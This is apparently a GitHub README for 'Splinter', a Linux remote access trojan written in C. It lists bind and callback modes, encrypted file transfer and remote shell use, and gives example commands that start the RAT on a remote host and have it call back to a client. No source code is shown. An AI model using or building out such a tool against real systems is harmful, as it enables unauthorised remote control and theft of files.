Skip to content

Latest commit

 

History

History
44 lines (29 loc) · 1.98 KB

README.md

File metadata and controls

44 lines (29 loc) · 1.98 KB

Splinter

Linux remote access trojan (RAT)

This is the starting code for a Linux RAT written in C. I was tired of there being no real Linux RATs, most of the time it's just ncat. It uses mbedTLS for encryption and miniz (but able to use zlib) compression for all the communications. I'm unsure if I did the crypto correctly, but I feel that it's good enough for now I started this project to learn C and I've been working on it for a couple months. If any problems happens or features wanted, please let me know.

rat.c

    -Port is configurable at runtime through the environment variable "P".  It will bind on all interfaces by default.
            -Uses poll to handle multiple connections
    -Capable of calling back via "I" environment variable.

rat-client.c

    -Command history and tab completion provided by readline
    -Currently has 4 native commands:
            .exit - Closes that current client's connection
            .kill - Kills off the rat process and all the client's connection
            download <remote file> <local file> - Chunks a file, compresses it and sends it over.  Will verify the file transfer via SHAA1 hash
            upload <local file> <remote file> - Performs the same operation as download but uploads instead

rat binds and client connects to it

    remote shell> P=12345 ./rat
    shell> ./rat-client 127.0.0.1 12345

rat calls back to client

    shell ./rat-client 12345
    remote_shell> I=127.0.0.1 P=12345 ./rat

TODO:

    Simple:
            -Move the rat.c output inside of DEBUG blocks so it's not spewing everywhere
            -Clean up rat-client.c output so it's a little nicer
            -Change the client command prompt to actually get the target's IP address

    Advanced:
            -Add in SSH-type tunnels to be able to do forward and reverse tunels
            -Add in the ability to fork and bind on a different port or callback via commands